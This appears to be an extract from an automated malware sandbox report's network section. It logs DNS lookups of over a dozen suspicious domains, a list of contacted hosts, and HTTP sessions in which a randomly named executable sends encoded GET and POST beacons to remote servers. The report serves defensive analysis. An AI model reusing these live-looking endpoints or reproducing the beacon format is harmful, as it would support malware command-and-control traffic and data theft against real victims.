                                                                                                                              Oct 7, 2024 12:36:24.286021948 CEST8050040162.0.215.33192.168.2.6
                                                                                                                              Oct 7, 2024 12:36:24.286058903 CEST8050040162.0.215.33192.168.2.6
                                                                                                                              Oct 7, 2024 12:36:24.286082983 CEST5004080192.168.2.6162.0.215.33
                                                                                                                              Oct 7, 2024 12:36:24.286091089 CEST8050040162.0.215.33192.168.2.6
                                                                                                                              Oct 7, 2024 12:36:24.286132097 CEST8050040162.0.215.33192.168.2.6
                                                                                                                              Oct 7, 2024 12:36:24.286194086 CEST5004080192.168.2.6162.0.215.33
                                                                                                                              Oct 7, 2024 12:36:24.290366888 CEST5004080192.168.2.6162.0.215.33
                                                                                                                              Oct 7, 2024 12:36:25.195478916 CEST5004080192.168.2.6162.0.215.33
                                                                                                                              Oct 7, 2024 12:36:26.214503050 CEST5004180192.168.2.6162.0.215.33
                                                                                                                              Oct 7, 2024 12:36:26.219640017 CEST8050041162.0.215.33192.168.2.6
                                                                                                                              Oct 7, 2024 12:36:26.222733021 CEST5004180192.168.2.6162.0.215.33
                                                                                                                              Oct 7, 2024 12:36:26.234390974 CEST5004180192.168.2.6162.0.215.33
                                                                                                                              Oct 7, 2024 12:36:26.239511013 CEST8050041162.0.215.33192.168.2.6
                                                                                                                              Oct 7, 2024 12:36:26.837969065 CEST8050041162.0.215.33192.168.2.6
                                                                                                                              Oct 7, 2024 12:36:26.838063002 CEST8050041162.0.215.33192.168.2.6
                                                                                                                              Oct 7, 2024 12:36:26.838089943 CEST8050041162.0.215.33192.168.2.6
                                                                                                                              Oct 7, 2024 12:36:26.838109016 CEST8050041162.0.215.33192.168.2.6
                                                                                                                              Oct 7, 2024 12:36:26.838124037 CEST8050041162.0.215.33192.168.2.6
                                                                                                                              Oct 7, 2024 12:36:26.838141918 CEST8050041162.0.215.33192.168.2.6
                                                                                                                              Oct 7, 2024 12:36:26.838386059 CEST5004180192.168.2.6162.0.215.33
                                                                                                                              Oct 7, 2024 12:36:26.838386059 CEST5004180192.168.2.6162.0.215.33
                                                                                                                              Oct 7, 2024 12:36:27.742640972 CEST5004180192.168.2.6162.0.215.33
                                                                                                                              Oct 7, 2024 12:36:28.761538982 CEST5004280192.168.2.6162.0.215.33
                                                                                                                              Oct 7, 2024 12:36:28.766767979 CEST8050042162.0.215.33192.168.2.6
                                                                                                                              Oct 7, 2024 12:36:28.773402929 CEST5004280192.168.2.6162.0.215.33
                                                                                                                              Oct 7, 2024 12:36:28.782408953 CEST5004280192.168.2.6162.0.215.33
                                                                                                                              Oct 7, 2024 12:36:28.787513971 CEST8050042162.0.215.33192.168.2.6
                                                                                                                              Oct 7, 2024 12:36:28.787544966 CEST8050042162.0.215.33192.168.2.6
                                                                                                                              Oct 7, 2024 12:36:29.376069069 CEST8050042162.0.215.33192.168.2.6
                                                                                                                              Oct 7, 2024 12:36:29.376112938 CEST8050042162.0.215.33192.168.2.6
                                                                                                                              Oct 7, 2024 12:36:29.376151085 CEST8050042162.0.215.33192.168.2.6
                                                                                                                              Oct 7, 2024 12:36:29.376188993 CEST8050042162.0.215.33192.168.2.6
                                                                                                                              Oct 7, 2024 12:36:29.376188040 CEST5004280192.168.2.6162.0.215.33
                                                                                                                              Oct 7, 2024 12:36:29.376224995 CEST8050042162.0.215.33192.168.2.6
                                                                                                                              Oct 7, 2024 12:36:29.376256943 CEST5004280192.168.2.6162.0.215.33
                                                                                                                              Oct 7, 2024 12:36:29.376260996 CEST8050042162.0.215.33192.168.2.6
                                                                                                                              Oct 7, 2024 12:36:29.376293898 CEST8050042162.0.215.33192.168.2.6
                                                                                                                              Oct 7, 2024 12:36:29.376312017 CEST5004280192.168.2.6162.0.215.33
                                                                                                                              Oct 7, 2024 12:36:29.376358986 CEST5004280192.168.2.6162.0.215.33
                                                                                                                              Oct 7, 2024 12:36:30.289377928 CEST5004280192.168.2.6162.0.215.33
                                                                                                                              Oct 7, 2024 12:36:31.307959080 CEST5004380192.168.2.6162.0.215.33
                                                                                                                              Oct 7, 2024 12:36:31.360162020 CEST8050043162.0.215.33192.168.2.6
                                                                                                                              Oct 7, 2024 12:36:31.360235929 CEST5004380192.168.2.6162.0.215.33
                                                                                                                              Oct 7, 2024 12:36:31.367244005 CEST5004380192.168.2.6162.0.215.33
                                                                                                                              Oct 7, 2024 12:36:31.372136116 CEST8050043162.0.215.33192.168.2.6
                                                                                                                              Oct 7, 2024 12:36:31.961532116 CEST8050043162.0.215.33192.168.2.6
                                                                                                                              Oct 7, 2024 12:36:31.961568117 CEST8050043162.0.215.33192.168.2.6
                                                                                                                              Oct 7, 2024 12:36:31.961584091 CEST8050043162.0.215.33192.168.2.6
                                                                                                                              Oct 7, 2024 12:36:31.961601973 CEST8050043162.0.215.33192.168.2.6
                                                                                                                              Oct 7, 2024 12:36:31.961621046 CEST8050043162.0.215.33192.168.2.6
                                                                                                                              Oct 7, 2024 12:36:31.961637020 CEST5004380192.168.2.6162.0.215.33
                                                                                                                              Oct 7, 2024 12:36:31.961637020 CEST5004380192.168.2.6162.0.215.33
                                                                                                                              Oct 7, 2024 12:36:31.961724043 CEST8050043162.0.215.33192.168.2.6
                                                                                                                              Oct 7, 2024 12:36:31.961795092 CEST8050043162.0.215.33192.168.2.6
                                                                                                                              Oct 7, 2024 12:36:31.961818933 CEST5004380192.168.2.6162.0.215.33
                                                                                                                              Oct 7, 2024 12:36:31.961944103 CEST8050043162.0.215.33192.168.2.6
                                                                                                                              Oct 7, 2024 12:36:31.961960077 CEST8050043162.0.215.33192.168.2.6
                                                                                                                              Oct 7, 2024 12:36:31.961977005 CEST8050043162.0.215.33192.168.2.6
                                                                                                                              Oct 7, 2024 12:36:31.962011099 CEST5004380192.168.2.6162.0.215.33
                                                                                                                              Oct 7, 2024 12:36:31.962028980 CEST5004380192.168.2.6162.0.215.33
                                                                                                                              Oct 7, 2024 12:36:31.966314077 CEST5004380192.168.2.6162.0.215.33
                                                                                                                              Oct 7, 2024 12:36:31.973546982 CEST8050043162.0.215.33192.168.2.6
                                                                                                                              Oct 7, 2024 12:36:37.018769026 CEST5004480192.168.2.68.217.17.192
                                                                                                                              Oct 7, 2024 12:36:37.023794889 CEST80500448.217.17.192192.168.2.6
                                                                                                                              Oct 7, 2024 12:36:37.023870945 CEST5004480192.168.2.68.217.17.192
                                                                                                                              Oct 7, 2024 12:36:37.032697916 CEST5004480192.168.2.68.217.17.192
                                                                                                                              Oct 7, 2024 12:36:37.037635088 CEST80500448.217.17.192192.168.2.6
                                                                                                                              Oct 7, 2024 12:36:37.921485901 CEST80500448.217.17.192192.168.2.6
                                                                                                                              Oct 7, 2024 12:36:37.921535015 CEST80500448.217.17.192192.168.2.6
                                                                                                                              Oct 7, 2024 12:36:37.921581984 CEST5004480192.168.2.68.217.17.192
                                                                                                                              Oct 7, 2024 12:36:38.542404890 CEST5004480192.168.2.68.217.17.192
                                                                                                                              Oct 7, 2024 12:36:39.558005095 CEST5004580192.168.2.68.217.17.192
                                                                                                                              Oct 7, 2024 12:36:39.563879013 CEST80500458.217.17.192192.168.2.6
                                                                                                                              Oct 7, 2024 12:36:39.563962936 CEST5004580192.168.2.68.217.17.192
                                                                                                                              Oct 7, 2024 12:36:39.576016903 CEST5004580192.168.2.68.217.17.192
                                                                                                                              Oct 7, 2024 12:36:39.581079960 CEST80500458.217.17.192192.168.2.6
                                                                                                                              Oct 7, 2024 12:36:40.465425968 CEST80500458.217.17.192192.168.2.6
                                                                                                                              Oct 7, 2024 12:36:40.465482950 CEST80500458.217.17.192192.168.2.6
                                                                                                                              Oct 7, 2024 12:36:40.470406055 CEST5004580192.168.2.68.217.17.192
                                                                                                                              Oct 7, 2024 12:36:41.086178064 CEST5004580192.168.2.68.217.17.192
                                                                                                                              Oct 7, 2024 12:36:42.106415033 CEST5004680192.168.2.68.217.17.192
                                                                                                                              Oct 7, 2024 12:36:42.111686945 CEST80500468.217.17.192192.168.2.6
                                                                                                                              Oct 7, 2024 12:36:42.117398977 CEST5004680192.168.2.68.217.17.192
                                                                                                                              Oct 7, 2024 12:36:42.126420975 CEST5004680192.168.2.68.217.17.192
                                                                                                                              Oct 7, 2024 12:36:42.131534100 CEST80500468.217.17.192192.168.2.6
                                                                                                                              Oct 7, 2024 12:36:42.131601095 CEST80500468.217.17.192192.168.2.6
                                                                                                                              Oct 7, 2024 12:36:43.034208059 CEST80500468.217.17.192192.168.2.6
                                                                                                                              Oct 7, 2024 12:36:43.034857035 CEST80500468.217.17.192192.168.2.6
                                                                                                                              Oct 7, 2024 12:36:43.038469076 CEST5004680192.168.2.68.217.17.192
                                                                                                                              Oct 7, 2024 12:36:43.633052111 CEST5004680192.168.2.68.217.17.192
                                                                                                                              Oct 7, 2024 12:36:44.651459932 CEST5004780192.168.2.68.217.17.192
                                                                                                                              Oct 7, 2024 12:36:44.656769037 CEST80500478.217.17.192192.168.2.6
                                                                                                                              Oct 7, 2024 12:36:44.658483982 CEST5004780192.168.2.68.217.17.192
                                                                                                                              Oct 7, 2024 12:36:44.664339066 CEST5004780192.168.2.68.217.17.192
                                                                                                                              Oct 7, 2024 12:36:44.669388056 CEST80500478.217.17.192192.168.2.6
                                                                                                                              Oct 7, 2024 12:37:06.037329912 CEST80500478.217.17.192192.168.2.6
                                                                                                                              Oct 7, 2024 12:37:06.037448883 CEST5004780192.168.2.68.217.17.192
                                                                                                                              Oct 7, 2024 12:37:06.075138092 CEST5004780192.168.2.68.217.17.192
                                                                                                                              Oct 7, 2024 12:37:06.082200050 CEST80500478.217.17.192192.168.2.6

                                                                                                                              UDP Packets

                                                                                                                              TimestampSource PortDest PortSource IPDest IP
                                                                                                                              Oct 7, 2024 12:33:29.907469034 CEST6502953192.168.2.61.1.1.1
                                                                                                                              Oct 7, 2024 12:33:29.933248997 CEST53650291.1.1.1192.168.2.6
                                                                                                                              Oct 7, 2024 12:33:45.463882923 CEST5662853192.168.2.61.1.1.1
                                                                                                                              Oct 7, 2024 12:33:46.244936943 CEST53566281.1.1.1192.168.2.6
                                                                                                                              Oct 7, 2024 12:33:59.886643887 CEST6168653192.168.2.61.1.1.1
                                                                                                                              Oct 7, 2024 12:33:59.905442953 CEST53616861.1.1.1192.168.2.6
                                                                                                                              Oct 7, 2024 12:34:13.420811892 CEST5305353192.168.2.61.1.1.1
                                                                                                                              Oct 7, 2024 12:34:13.439279079 CEST53530531.1.1.1192.168.2.6
                                                                                                                              Oct 7, 2024 12:34:27.464713097 CEST5106053192.168.2.61.1.1.1
                                                                                                                              Oct 7, 2024 12:34:27.478151083 CEST53510601.1.1.1192.168.2.6
                                                                                                                              Oct 7, 2024 12:34:40.732362032 CEST5191353192.168.2.61.1.1.1
                                                                                                                              Oct 7, 2024 12:34:40.946930885 CEST53519131.1.1.1192.168.2.6
                                                                                                                              Oct 7, 2024 12:34:54.214430094 CEST5201353192.168.2.61.1.1.1
                                                                                                                              Oct 7, 2024 12:34:54.239947081 CEST53520131.1.1.1192.168.2.6
                                                                                                                              Oct 7, 2024 12:35:07.526848078 CEST5636153192.168.2.61.1.1.1
                                                                                                                              Oct 7, 2024 12:35:07.541565895 CEST53563611.1.1.1192.168.2.6
                                                                                                                              Oct 7, 2024 12:35:20.671493053 CEST6160153192.168.2.61.1.1.1
                                                                                                                              Oct 7, 2024 12:35:21.335228920 CEST53616011.1.1.1192.168.2.6
                                                                                                                              Oct 7, 2024 12:35:34.784984112 CEST5380153192.168.2.61.1.1.1
                                                                                                                              Oct 7, 2024 12:35:34.880687952 CEST53538011.1.1.1192.168.2.6
                                                                                                                              Oct 7, 2024 12:35:48.482403040 CEST6159853192.168.2.61.1.1.1
                                                                                                                              Oct 7, 2024 12:35:48.496912003 CEST53615981.1.1.1192.168.2.6
                                                                                                                              Oct 7, 2024 12:36:01.636467934 CEST6176353192.168.2.61.1.1.1
                                                                                                                              Oct 7, 2024 12:36:01.652199984 CEST53617631.1.1.1192.168.2.6
                                                                                                                              Oct 7, 2024 12:36:09.713977098 CEST6342253192.168.2.61.1.1.1
                                                                                                                              Oct 7, 2024 12:36:10.145410061 CEST53634221.1.1.1192.168.2.6
                                                                                                                              Oct 7, 2024 12:36:23.652781010 CEST5332653192.168.2.61.1.1.1
                                                                                                                              Oct 7, 2024 12:36:23.673620939 CEST53533261.1.1.1192.168.2.6
                                                                                                                              Oct 7, 2024 12:36:36.980202913 CEST5953553192.168.2.61.1.1.1
                                                                                                                              Oct 7, 2024 12:36:37.015419006 CEST53595351.1.1.1192.168.2.6

                                                                                                                              DNS Queries

                                                                                                                              TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                              Oct 7, 2024 12:33:29.907469034 CEST192.168.2.61.1.1.10x2d93Standard query (0)www.whiterabbitgroup.proA (IP address)IN (0x0001)false
                                                                                                                              Oct 7, 2024 12:33:45.463882923 CEST192.168.2.61.1.1.10x87fcStandard query (0)www.wonders8.liveA (IP address)IN (0x0001)false
                                                                                                                              Oct 7, 2024 12:33:59.886643887 CEST192.168.2.61.1.1.10xa405Standard query (0)www.golizle22.xyzA (IP address)IN (0x0001)false
                                                                                                                              Oct 7, 2024 12:34:13.420811892 CEST192.168.2.61.1.1.10x4ffeStandard query (0)www.impulsarnegocios.infoA (IP address)IN (0x0001)false
                                                                                                                              Oct 7, 2024 12:34:27.464713097 CEST192.168.2.61.1.1.10xf8c1Standard query (0)www.nieuws-july202541.sbsA (IP address)IN (0x0001)false
                                                                                                                              Oct 7, 2024 12:34:40.732362032 CEST192.168.2.61.1.1.10x93a5Standard query (0)www.acuarelacr.buzzA (IP address)IN (0x0001)false
                                                                                                                              Oct 7, 2024 12:34:54.214430094 CEST192.168.2.61.1.1.10x4342Standard query (0)www.booosted.xyzA (IP address)IN (0x0001)false
                                                                                                                              Oct 7, 2024 12:35:07.526848078 CEST192.168.2.61.1.1.10xbc93Standard query (0)www.gegeesthreadworks.infoA (IP address)IN (0x0001)false
                                                                                                                              Oct 7, 2024 12:35:20.671493053 CEST192.168.2.61.1.1.10x7b13Standard query (0)www.sellvolt.lifeA (IP address)IN (0x0001)false
                                                                                                                              Oct 7, 2024 12:35:34.784984112 CEST192.168.2.61.1.1.10xdcd8Standard query (0)www.kk88.liveA (IP address)IN (0x0001)false
                                                                                                                              Oct 7, 2024 12:35:48.482403040 CEST192.168.2.61.1.1.10x5f3Standard query (0)www.cablecarrental.netA (IP address)IN (0x0001)false
                                                                                                                              Oct 7, 2024 12:36:01.636467934 CEST192.168.2.61.1.1.10xb55eStandard query (0)www.o30cf998d.cfdA (IP address)IN (0x0001)false
                                                                                                                              Oct 7, 2024 12:36:09.713977098 CEST192.168.2.61.1.1.10x5796Standard query (0)www.kuaimaolife.shopA (IP address)IN (0x0001)false
                                                                                                                              Oct 7, 2024 12:36:23.652781010 CEST192.168.2.61.1.1.10xa589Standard query (0)www.nieuws-july202491.sbsA (IP address)IN (0x0001)false
                                                                                                                              Oct 7, 2024 12:36:36.980202913 CEST192.168.2.61.1.1.10xfcafStandard query (0)www.meliorahomes.netA (IP address)IN (0x0001)false

                                                                                                                              DNS Answers

                                                                                                                              TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                              Oct 7, 2024 12:33:29.933248997 CEST1.1.1.1192.168.2.60x2d93No error (0)www.whiterabbitgroup.prowhiterabbitgroup.proCNAME (Canonical name)IN (0x0001)false
                                                                                                                              Oct 7, 2024 12:33:29.933248997 CEST1.1.1.1192.168.2.60x2d93No error (0)whiterabbitgroup.pro3.33.130.190A (IP address)IN (0x0001)false
                                                                                                                              Oct 7, 2024 12:33:29.933248997 CEST1.1.1.1192.168.2.60x2d93No error (0)whiterabbitgroup.pro15.197.148.33A (IP address)IN (0x0001)false
                                                                                                                              Oct 7, 2024 12:33:46.244936943 CEST1.1.1.1192.168.2.60x87fcNo error (0)www.wonders8.livewonders8.liveCNAME (Canonical name)IN (0x0001)false
                                                                                                                              Oct 7, 2024 12:33:46.244936943 CEST1.1.1.1192.168.2.60x87fcNo error (0)wonders8.live119.18.54.27A (IP address)IN (0x0001)false
                                                                                                                              Oct 7, 2024 12:33:59.905442953 CEST1.1.1.1192.168.2.60xa405No error (0)www.golizle22.xyz104.21.5.125A (IP address)IN (0x0001)false
                                                                                                                              Oct 7, 2024 12:33:59.905442953 CEST1.1.1.1192.168.2.60xa405No error (0)www.golizle22.xyz172.67.133.115A (IP address)IN (0x0001)false
                                                                                                                              Oct 7, 2024 12:34:13.439279079 CEST1.1.1.1192.168.2.60x4ffeNo error (0)www.impulsarnegocios.infoimpulsarnegocios.infoCNAME (Canonical name)IN (0x0001)false
                                                                                                                              Oct 7, 2024 12:34:13.439279079 CEST1.1.1.1192.168.2.60x4ffeNo error (0)impulsarnegocios.info3.33.130.190A (IP address)IN (0x0001)false
                                                                                                                              Oct 7, 2024 12:34:13.439279079 CEST1.1.1.1192.168.2.60x4ffeNo error (0)impulsarnegocios.info15.197.148.33A (IP address)IN (0x0001)false
                                                                                                                              Oct 7, 2024 12:34:27.478151083 CEST1.1.1.1192.168.2.60xf8c1No error (0)www.nieuws-july202541.sbsnieuws-july202541.sbsCNAME (Canonical name)IN (0x0001)false
                                                                                                                              Oct 7, 2024 12:34:27.478151083 CEST1.1.1.1192.168.2.60xf8c1No error (0)nieuws-july202541.sbs162.0.215.33A (IP address)IN (0x0001)false
                                                                                                                              Oct 7, 2024 12:34:40.946930885 CEST1.1.1.1192.168.2.60x93a5No error (0)www.acuarelacr.buzz161.97.168.245A (IP address)IN (0x0001)false
                                                                                                                              Oct 7, 2024 12:34:54.239947081 CEST1.1.1.1192.168.2.60x4342No error (0)www.booosted.xyzbooosted.xyzCNAME (Canonical name)IN (0x0001)false
                                                                                                                              Oct 7, 2024 12:34:54.239947081 CEST1.1.1.1192.168.2.60x4342No error (0)booosted.xyz3.33.130.190A (IP address)IN (0x0001)false
                                                                                                                              Oct 7, 2024 12:34:54.239947081 CEST1.1.1.1192.168.2.60x4342No error (0)booosted.xyz15.197.148.33A (IP address)IN (0x0001)false
                                                                                                                              Oct 7, 2024 12:35:07.541565895 CEST1.1.1.1192.168.2.60xbc93No error (0)www.gegeesthreadworks.infogegeesthreadworks.infoCNAME (Canonical name)IN (0x0001)false
                                                                                                                              Oct 7, 2024 12:35:07.541565895 CEST1.1.1.1192.168.2.60xbc93No error (0)gegeesthreadworks.info3.33.130.190A (IP address)IN (0x0001)false
                                                                                                                              Oct 7, 2024 12:35:07.541565895 CEST1.1.1.1192.168.2.60xbc93No error (0)gegeesthreadworks.info15.197.148.33A (IP address)IN (0x0001)false
                                                                                                                              Oct 7, 2024 12:35:21.335228920 CEST1.1.1.1192.168.2.60x7b13No error (0)www.sellvolt.life209.74.64.190A (IP address)IN (0x0001)false
                                                                                                                              Oct 7, 2024 12:35:34.880687952 CEST1.1.1.1192.168.2.60xdcd8No error (0)www.kk88.livekk88.liveCNAME (Canonical name)IN (0x0001)false
                                                                                                                              Oct 7, 2024 12:35:34.880687952 CEST1.1.1.1192.168.2.60xdcd8No error (0)kk88.live68.178.233.113A (IP address)IN (0x0001)false
                                                                                                                              Oct 7, 2024 12:35:48.496912003 CEST1.1.1.1192.168.2.60x5f3No error (0)www.cablecarrental.netcablecarrental.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                              Oct 7, 2024 12:35:48.496912003 CEST1.1.1.1192.168.2.60x5f3No error (0)cablecarrental.net3.33.130.190A (IP address)IN (0x0001)false
                                                                                                                              Oct 7, 2024 12:35:48.496912003 CEST1.1.1.1192.168.2.60x5f3No error (0)cablecarrental.net15.197.148.33A (IP address)IN (0x0001)false
                                                                                                                              Oct 7, 2024 12:36:01.652199984 CEST1.1.1.1192.168.2.60xb55eName error (3)www.o30cf998d.cfdnonenoneA (IP address)IN (0x0001)false
                                                                                                                              Oct 7, 2024 12:36:10.145410061 CEST1.1.1.1192.168.2.60x5796No error (0)www.kuaimaolife.shop38.55.251.233A (IP address)IN (0x0001)false
                                                                                                                              Oct 7, 2024 12:36:23.673620939 CEST1.1.1.1192.168.2.60xa589No error (0)www.nieuws-july202491.sbsnieuws-july202491.sbsCNAME (Canonical name)IN (0x0001)false
                                                                                                                              Oct 7, 2024 12:36:23.673620939 CEST1.1.1.1192.168.2.60xa589No error (0)nieuws-july202491.sbs162.0.215.33A (IP address)IN (0x0001)false
                                                                                                                              Oct 7, 2024 12:36:37.015419006 CEST1.1.1.1192.168.2.60xfcafNo error (0)www.meliorahomes.net8.217.17.192A (IP address)IN (0x0001)false

                                                                                                                              HTTP Request Dependency Graph

                                                                                                                              • www.whiterabbitgroup.pro
                                                                                                                              • www.wonders8.live
                                                                                                                              • www.golizle22.xyz
                                                                                                                              • www.impulsarnegocios.info
                                                                                                                              • www.nieuws-july202541.sbs
                                                                                                                              • www.acuarelacr.buzz
                                                                                                                              • www.booosted.xyz
                                                                                                                              • www.gegeesthreadworks.info
                                                                                                                              • www.sellvolt.life
                                                                                                                              • www.kk88.live
                                                                                                                              • www.cablecarrental.net
                                                                                                                              • www.kuaimaolife.shop
                                                                                                                              • www.nieuws-july202491.sbs
                                                                                                                              • www.meliorahomes.net

                                                                                                                              HTTP Packets

                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              0192.168.2.6498643.33.130.190801460C:\Program Files (x86)\oXMrKrVQmpfyXXbTeHWanCtVJeNmquaEinTWGKjuVyEkKRtWr\IEFVDUdSaLLhw.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              Oct 7, 2024 12:33:29.953324080 CEST512OUTGET /woyi/?An=mLdxo2Y8RLRh&ej6Le=liT4ZvY+2rzgu/UySgm47PML3ORjyZfCr6UpwpMzCweBEUZYpuqhq1mvJHjke4Uqr9Ttl6ktg6VhmA6yP/C42/0uWdACaDjPwlAEpqkr1rm8nQp5jQDy/v7kwBfcS6SUx+7tvUI= HTTP/1.1
                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                              Accept-Language: en-US
                                                                                                                              Host: www.whiterabbitgroup.pro
                                                                                                                              Connection: close
                                                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
                                                                                                                              Oct 7, 2024 12:33:30.413278103 CEST413INHTTP/1.1 200 OK
                                                                                                                              Server: openresty
                                                                                                                              Date: Mon, 07 Oct 2024 10:33:30 GMT
                                                                                                                              Content-Type: text/html
                                                                                                                              Content-Length: 273
                                                                                                                              Connection: close
                                                                                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 41 6e 3d 6d 4c 64 78 6f 32 59 38 52 4c 52 68 26 65 6a 36 4c 65 3d 6c 69 54 34 5a 76 59 2b 32 72 7a 67 75 2f 55 79 53 67 6d 34 37 50 4d 4c 33 4f 52 6a 79 5a 66 43 72 36 55 70 77 70 4d 7a 43 77 65 42 45 55 5a 59 70 75 71 68 71 31 6d 76 4a 48 6a 6b 65 34 55 71 72 39 54 74 6c 36 6b 74 67 36 56 68 6d 41 36 79 50 2f 43 34 32 2f 30 75 57 64 41 43 61 44 6a 50 77 6c 41 45 70 71 6b 72 31 72 6d 38 6e 51 70 35 6a 51 44 79 2f 76 37 6b 77 42 66 63 53 36 53 55 78 2b 37 74 76 55 49 3d 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
                                                                                                                              Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?An=mLdxo2Y8RLRh&ej6Le=liT4ZvY+2rzgu/UySgm47PML3ORjyZfCr6UpwpMzCweBEUZYpuqhq1mvJHjke4Uqr9Ttl6ktg6VhmA6yP/C42/0uWdACaDjPwlAEpqkr1rm8nQp5jQDy/v7kwBfcS6SUx+7tvUI="}</script></head></html>


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              1192.168.2.649969119.18.54.27801460C:\Program Files (x86)\oXMrKrVQmpfyXXbTeHWanCtVJeNmquaEinTWGKjuVyEkKRtWr\IEFVDUdSaLLhw.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              Oct 7, 2024 12:33:46.262151957 CEST763OUTPOST /ctxc/ HTTP/1.1
                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                              Accept-Language: en-US
                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                              Host: www.wonders8.live
                                                                                                                              Origin: http://www.wonders8.live
                                                                                                                              Connection: close
                                                                                                                              Content-Length: 210
                                                                                                                              Cache-Control: no-cache
                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                              Referer: http://www.wonders8.live/ctxc/
                                                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
                                                                                                                              Data Raw: 65 6a 36 4c 65 3d 2b 66 4c 51 79 64 6f 69 34 43 78 57 71 41 79 73 49 5a 4e 44 62 79 61 6d 75 59 71 38 42 56 31 63 58 45 6f 57 49 62 77 75 62 74 32 44 30 74 34 39 53 31 6b 52 35 63 68 73 38 38 59 44 68 6c 51 65 50 6b 43 54 31 30 7a 54 54 56 51 78 6b 31 68 46 79 64 52 79 78 43 4c 36 6e 4e 44 74 6d 6a 66 48 63 6c 47 79 49 52 70 75 43 45 39 31 57 65 58 47 6d 53 4d 61 71 51 76 38 35 6b 68 47 49 56 65 34 39 4b 64 77 4d 78 31 73 42 61 33 67 74 6f 73 73 45 47 2b 54 2f 7a 5a 36 54 41 73 5a 52 66 62 66 53 51 46 6e 54 42 47 50 35 78 34 6f 6a 4b 4d 49 67 4b 55 32 67 37 6a 7a 66 39 72 39 39 2b 6d 44 37 38 4c 50 38 77 77 38 59 4e 53 63
                                                                                                                              Data Ascii: ej6Le=+fLQydoi4CxWqAysIZNDbyamuYq8BV1cXEoWIbwubt2D0t49S1kR5chs88YDhlQePkCT10zTTVQxk1hFydRyxCL6nNDtmjfHclGyIRpuCE91WeXGmSMaqQv85khGIVe49KdwMx1sBa3gtossEG+T/zZ6TAsZRfbfSQFnTBGP5x4ojKMIgKU2g7jzf9r99+mD78LP8ww8YNSc
                                                                                                                              Oct 7, 2024 12:33:47.257277012 CEST643INHTTP/1.1 404 Not Found
                                                                                                                              Date: Mon, 07 Oct 2024 10:33:47 GMT
                                                                                                                              Server: Apache
                                                                                                                              Upgrade: h2,h2c
                                                                                                                              Connection: Upgrade, close
                                                                                                                              Last-Modified: Mon, 01 Mar 2021 15:47:38 GMT
                                                                                                                              Accept-Ranges: bytes
                                                                                                                              Vary: Accept-Encoding
                                                                                                                              Content-Encoding: gzip
                                                                                                                              Content-Length: 358
                                                                                                                              Content-Type: text/html
                                                                                                                              Data Raw: 1f 8b 08 00 00 00 00 00 00 03 8d 52 4b 4f c3 30 0c be ef 57 58 41 93 e0 b0 b6 7b 30 6d 7d 09 21 71 e1 02 37 b8 4d 59 93 b6 5e db 24 4a b2 17 13 ff 9d 74 ad 0a 1c 90 48 a4 c4 ce f7 f9 b3 6c 27 2e 6d 53 a7 a3 b8 e4 94 a5 23 70 2b 36 f6 5c f3 ce 6e 97 57 4b ca b8 86 0b 6c a5 76 46 08 d3 a5 3a 81 91 35 32 b8 c9 e7 ed 8e 7a 6c 62 a5 fa 8d cf 17 eb 15 db 0e b8 a6 0c f7 26 84 fb 60 1c c1 11 99 2d 1d 7d 16 a8 53 04 25 c7 a2 b4 83 4b 05 36 d4 a2 14 21 18 85 02 66 06 6a 14 9c 6a 40 91 a3 40 cb 23 50 d2 60 47 c9 f1 c4 59 04 d7 f4 8b 56 bb e6 b9 ed cd cf a1 94 87 8a 9f 73 4d 1b 6e 3a cd 0b 04 63 77 58 4d 85 c9 a5 6e 42 d0 d2 52 cb 6f 03 c6 8b 3b 17 09 d3 e0 0f c6 7c 39 70 3a fd d8 ff d1 b7 d8 64 1a 95 85 9a 8a 62 4f 0b 9e 90 67 7a a0 dd 23 49 0f ae 88 8d a9 3e 36 ca 75 28 01 b2 7e 7d 79 7c 7a 5f 05 6f 24 72 2a 57 d2 3f 64 c0 e8 2c 21 a5 b5 2a f4 fd 8c 09 6f 67 da b6 78 0c 35 cf 6c 7e 64 5e 26 1b df 54 93 9d 51 54 57 9b 2b a8 4a 45 d2 ef 24 b1 df cd 3d de 4a 76 76 17 c3 03 64 35 35 26 21 dd d4 09 20 4b 88 13 e9 [TRUNCATED]
                                                                                                                              Data Ascii: RKO0WXA{0m}!q7MY^$JtHl'.mS#p+6\nWKlvF:52zlb&`-}S%K6!fjj@@#P`GYVsMn:cwXMnBRo;|9p:dbOgz#I>6u(~}y|z_o$r*W?d,!*ogx5l~d^&TQTW+JE$=Jvvd55&! K]8m`wcG


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
